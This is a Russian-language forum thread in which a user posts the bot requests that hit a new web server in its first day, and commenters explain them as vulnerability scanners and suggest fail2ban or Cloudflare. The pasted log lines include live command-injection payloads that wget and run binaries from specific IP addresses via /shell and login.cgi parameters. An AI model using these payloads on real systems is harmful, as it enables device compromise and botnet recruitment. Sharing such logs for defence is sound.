LINUX.ORG.RU
ФорумTalks

Долбит нормально!

 


1

1

GET запросы на простейший веб сервер за сутки(от поднятия)

/shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
/login.cgi?cli=aa aa';wget http://46.166.185.42/e -O -> /tmp/hk;sh /tmp/hk'$
/login.cgi?cli=aa aa';wget http://199.195.254.118/dlink -O -> /tmp/xd;sh /tmp/xd'$

http://5.188.210.12/echo.php
http://httpheader.net/

/manager/html
/admin/assets/js/views/login.js

шо им надо lul



Последнее исправление: missxu (всего исправлений: 1)

простенькие боты ищут уязвимости

WindowsXP ★★
()

Небольшой собственный опыт. После создания сервера, его через несколько минут уже начинают долбить. В моем случае это были миллионы попыток сбрутить пароль к шеллу. Это далеко не один сервер.

ozz_is_here
()
Ответ на: комментарий от ozz_is_here

они долбят в 404 без остановки, конечно пока не сотни запросов в сек, а всего пару в минуту

но блин тамже 404, че они в холостую то

missxu
() автор топика
Ответ на: комментарий от missxu

Предлагаешь каждой ноде в ботнете еще и обмениваться инфой где какая страница что ответила? Им же нужно дыру найти, другие результаты их не интересуют.

Ставлю fail2ban одним из первых пакетов на новой виртуалке просто чтоб вот это все в логи не гадило.

micronekodesu ★★★
()
Ответ на: комментарий от missxu

404 - not found, ищем следующий.
просто не отвечай им

dib2 ★★★★★
()

тупые боты ищут дырки.

странно что не смотрят .svn/ и подобные - их «web-masters» частенько оставляют от мега-ума

MKuznetsov ★★★★★
()
Ответ на: комментарий от MKuznetsov

странно что не смотрят .svn/ и подобные - их «web-masters» частенько оставляют от мега-ума

Живым хакерам может и интересно было бы, а ботам оно зачем, не станут же они ковыряться в коде сайта. А чтобы туда еще и писать можно было любому из интернета, думаю не настолько все же вебмастера мегаумные.

praseodim ★★★★★
()
Ответ на: комментарий от praseodim

судя по топику - ищут кривые аппаратные прошивки на которых заюзать прокси. Это просто по первости, как только ip засветился или засканен, потому что самое простое и быстрое. easy-money :-) дальше будет хуже 100%

MKuznetsov ★★★★★
()

натравить на них fail2ban

int13h ★★★★★
()

или через cloudflare пропустите трафик, предварительно разрешив работу только с cloudflare

int13h ★★★★★
()

11 лет хоумпейджу, все это время постоянно долбятся. Ну и пусть. Какой-либо значимый трафик они не создают.

Pentium02 ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.